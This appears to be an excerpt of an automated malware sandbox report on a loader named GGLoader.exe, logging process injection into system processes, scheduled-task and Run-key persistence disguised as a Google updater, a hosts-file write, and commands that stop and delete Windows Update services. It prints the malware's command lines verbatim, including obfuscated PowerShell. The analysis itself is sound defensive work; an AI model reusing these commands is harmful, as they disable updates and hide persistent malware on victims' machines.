Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A4014E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A401510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5FC570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WerFault.exe base: 27CE7AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: PID: 2580 base: 87C0000 value: 4D
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Section loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Thread register set: target process: 916
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 8168
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Memory written: C:\Windows\System32\dialer.exe base: 1002B9010
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140003000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140005000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 6DFA038010
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAED90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B390000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2108BA20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 29166900000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 87C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17AABF90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1600D650000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 23FD1160000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1B9A6A80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 13713CB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 226B1810000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 208F5FC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2505E560000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C51E3F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1C08C180000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A4014E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A401510000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5FC570000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WerFault.exe base: 27CE7AB0000
Source: C:\Users\user\Desktop\GGLoader.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "[Base64-encoded command blob elided; its decoded form is listed in the "Base64 decoded" entry above]"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('No Virtual Machine/Server is allowed! Try running on a different device!','','OK','Error')<#wkk#>;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\LicCheck.exe "C:\Users\user\AppData\Local\Temp\LicCheck.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\LicSend.exe "C:\Users\user\AppData\Local\Temp\LicSend.exe"
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{096b6fe7-1e57-4538-901c-c68ea60d3345}
Source: C:\Users\user\Desktop\GGLoader.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "[lower-cased Base64-encoded command blob elided; its decoded form is listed in the "Base64 decoded" entry above]"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" add-type -assemblyname system.windows.forms;<#nus#>[system.windows.forms.messagebox]::show('no virtual machine/server is allowed! try running on a different device!','','ok','error')<#wkk#>;
                        Source: unknownProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ncotqmia#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "googleupdatetaskmachineqc" /t reg_sz /f /d 'c:\program files\google\chrome\updater.exe' }
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe "function local:nglbonfbsunr{param([outputtype([type])][parameter(position=0)][type[]]$qtvyipwnfcficq,[parameter(position=1)][type]$hhlnovedyw)$dpttuehyisd=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+'r'+''+[char](101)+''+[char](102)+''+[char](108)+''+[char](101)+''+[char](99)+''+'t'+''+[char](101)+''+'d'+''+[char](68)+'e'+[char](108)+''+'e'+''+[char](103)+'a'+'t'+''+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+'i'+''+[char](110)+''+[char](77)+'em'+[char](111)+''+[char](114)+''+[char](121)+'m'+'o'+''+[char](100)+'u'+[char](108)+'e',$false).definetype(''+[char](77)+'yd'+'e'+'l'+[char](101)+''+'g'+'at'+'e'+''+'t'+''+[char](121)+''+'p'+''+[char](101)+'',''+[char](67)+''+[char](108)+''+'a'+''+[char](115)+''+[char](115)+''+[char](44)+'p'+[char](117)+''+'b'+''+[char](108)+'ic'+[char](44)+''+[char](83)+''+[char](101)+'ale'+[char](100)+''+[char](44)+''+[char](65)+''+'n'+''+[char](115)+'i'+'c'+''+'l'+''+[char](97)+''+[char](115)+''+[char](115)+''+[char](44)+''+'a'+''+[char](117)+''+[char](116)+'o'+[char](67)+''+[char](108)+''+[char](97)+''+[char](115)+''+[char](115)+'',[multicastdelegate]);$dpttuehyisd.defineconstructor(''+[char](82)+''+'t'+''+'s'+''+[char](112)+''+[char](101)+''+'c'+''+[char](105)+''+[char](97)+''+'l'+''+[char](78)+''+[char](97)+''+'m'+'e,'+[char](72)+'ide'+'b'+'y'+'s'+''+'i'+''+[char](103)+''+','+'p'+[char](117)+''+'b'+'l'+'i'+''+[char](99)+'',[reflection.callingconventions]::standard,$qtvyipwnfcficq).setimplementationflags(''+[char](82)+''+[char](117)+'nt'+[char](105)+'m'+[char](101)+''+[char](44)+''+[char](77)+''+'a'+'n'+[char](97)+''+[char](103)+'e'+[char](100)+'');$dpttuehyisd.definemethod('i'+[char](110)+''+[char](118)+''+'o'+''+[char](107)+''+'e'+'',''+[char](80)+''+[char](117)+''+[char](98)+'l'+'i
'+''+'c'+''+[char](44)+''+[char](72)+''+[char](105)+''+[char](100)+'e'+[char](66)+'y'+'s'+''+[char](105)+'g'+[char](44)+'n'+'e'+'w'+[char](83)+''+[char](108)+''+[char](111)+''+'t'+''+[char](44)+''+[char](86)+''+[char](105)+''+'r'+''+[char](116)+''+'u'+''+[char](97)+''+'l'+'',$hhlnovedyw,$qtvyipwnfcficq).setimplementationflags('r'+[char](117)+''+[char](110)+''+[char](116)+''+[char](105)+''+[char](109)+''+[char](101)+''+','+''+[char](77)+''+'a'+''+'n'+''+'a'+''+[char](103)+''+[char](101)+''+'d'+'');write-output $dpttuehyisd.createtype();}$fxvcjurjeeuct=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+'s'+''+[char](121)+''+[char](115)+''+'t'+''+[char](101)+'m'+'.'+''+[char](100)+''+[char](108)+''+'l'+'')}).gettype('m'+'i'+''+[char](99)+''+[char](114)+''+[char](111)+''+'s'+'o'+'f'+'t'+'.'+''+'w'+''+[char](105)+''+'n'+''+[char](51)+''+'2'+''+[char](46)+''+'u'+'n'+[char](115)+''+[char](97)+''+[char](102)+''+[char](101)+'f'+'x'+''+[char](118)+'c'+[char](106)+''+'u'+''+[char](
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:qgcytqphzuyk{param([outputtype([type])][parameter(position=0)][type[]]$mpiggxnlyyxmmn,[parameter(position=1)][type]$ykftymbqtb)$nmulmondbgm=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+''+[char](101)+'f'+'l'+'e'+'c'+''+'t'+'e'+[char](100)+'d'+[char](101)+''+[char](108)+'e'+'g'+''+[char](97)+''+[char](116)+''+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule('i'+[char](110)+''+[char](77)+''+[char](101)+''+'m'+'or'+[char](121)+''+[char](77)+''+[char](111)+''+'d'+'u'+[char](108)+''+'e'+'',$false).definetype(''+[char](77)+''+'y'+''+[char](68)+''+[char](101)+'le'+[char](103)+''+[char](97)+''+'t'+''+[char](101)+''+[char](84)+''+'y'+'p'+[char](101)+'',''+[char](67)+''+'l'+''+[char](97)+''+[char](115)+'s'+[char](44)+''+[char](80)+''+[char](117)+''+[char](98)+'li'+'c'+''+','+'s'+[char](101)+''+'a'+''+[char](108)+'ed,a'+[char](110)+'s'+[char](105)+''+[char](67)+''+[char](108)+''+'a'+''+[char](115)+'s'+[char](44)+''+[char](65)+''+'u'+''+[char](116)+''+[char](111)+''+[char](67)+''+'l'+''+'a'+''+[char](115)+''+[char](115)+'',[multicastdelegate]);$nmulmondbgm.defineconstructor(''+[char](82)+'t'+[char](83)+''+'p'+''+[char](101)+''+'c'+''+[char](105)+''+'a'+''+'l'+''+[char](78)+''+[char](97)+'me'+[char](44)+''+[char](72)+''+'i'+''+[char](100)+''+'e'+''+[char](66)+''+[char](121)+'si'+[char](103)+''+','+''+[char](80)+''+[char](117)+''+'b'+''+[char](108)+'i'+[char](99)+'',[reflection.callingconventions]::standard,$mpiggxnlyyxmmn).setimplementationflags(''+'r'+'u'+[char](110)+'t'+[char](105)+''+[char](109)+''+[char](101)+''+[char](44)+''+'m'+''+[char](97)+'n'+[char](97)+''+'g'+''+'e'+''+[char](100)+'');$nmulmondbgm.definemethod(''+[char](73)+''+[char](110)+''+[char](118)+''+[char](111)+''+'k'+''+[char](101)+'',''+[c
har](80)+''+[char](117)+'b'+[char](108)+'i'+[char](99)+','+[char](72)+''+'i'+''+[char](100)+''+[char](101)+''+[char](66)+'y'+[char](83)+'ig'+[char](44)+''+[char](78)+''+[char](101)+''+[char](119)+'s'+[char](108)+'ot'+[char](44)+'v'+[char](105)+'r'+'t'+'u'+[char](97)+''+[char](108)+'',$ykftymbqtb,$mpiggxnlyyxmmn).setimplementationflags(''+[char](82)+''+[char](117)+''+[char](110)+''+'t'+''+[char](105)+''+[char](109)+''+[char](101)+''+[char](44)+'m'+'a'+''+[char](110)+''+'a'+''+'g'+''+[char](101)+'d');write-output $nmulmondbgm.createtype();}$mrsnzvuswjbnm=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+[char](83)+''+[char](121)+''+[char](115)+''+[char](116)+''+[char](101)+''+[char](109)+'.d'+[char](108)+'l')}).gettype('mi'+[char](99)+''+'r'+''+[char](111)+''+[char](115)+''+[char](111)+''+'f'+''+[char](116)+''+'.'+''+'w'+''+'i'+''+'n'+'3'+[char](50)+'.'+'u'+''+[char](110)+''+[char](115)+''+[char](97)+''+[char](102)+'emr'+[char](115)+''+[char](78)+''+[char](90)+''+'v'+''+[
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ncotqmia#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "googleupdatetaskmachineqc" /t reg_sz /f /d 'c:\program files\google\chrome\updater.exe' }
                        Source: C:\Windows\System32\dllhost.exeCode function: 42_2_0000000140001C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,42_2_0000000140001C64
                        Source: dwm.exe, 0000002E.00000002.2994797055.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000002E.00000000.2235418179.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                        Source: winlogon.exe, 0000002B.00000000.2219013843.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002B.00000002.2969652088.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000002E.00000000.2236251350.000002BAA8051000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                        Source: winlogon.exe, 0000002B.00000000.2219013843.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002B.00000002.2969652088.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000002E.00000000.2236251350.000002BAA8051000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                        Source: winlogon.exe, 0000002B.00000000.2219013843.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002B.00000002.2969652088.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000002E.00000000.2236251350.000002BAA8051000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                        Source: winlogon.exe, 0000002B.00000000.2219013843.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002B.00000002.2969652088.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000002E.00000000.2236251350.000002BAA8051000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_007A5815 cpuid 6_2_007A5815
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: EnumSystemLocalesW,6_2_007BD13B
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: GetLocaleInfoW,6_2_007B51E1
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: EnumSystemLocalesW,6_2_007BD186
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: EnumSystemLocalesW,6_2_007BD221
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,6_2_007BD2AC
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: GetLocaleInfoW,6_2_007BD4FF
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_007BD628
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: GetLocaleInfoW,6_2_007BD72E
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_007BD7FD
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: EnumSystemLocalesW,6_2_007B4CBB
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,6_2_007BCE99
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: GetLocaleInfoW,35_2_00C051E1
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: EnumSystemLocalesW,35_2_00C0D186
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: EnumSystemLocalesW,35_2_00C0D13B
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,35_2_00C0D2AC
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: EnumSystemLocalesW,35_2_00C0D221
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: GetLocaleInfoW,35_2_00C0D4FF
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,35_2_00C0D628
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,35_2_00C0D7FD
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: GetLocaleInfoW,35_2_00C0D72E
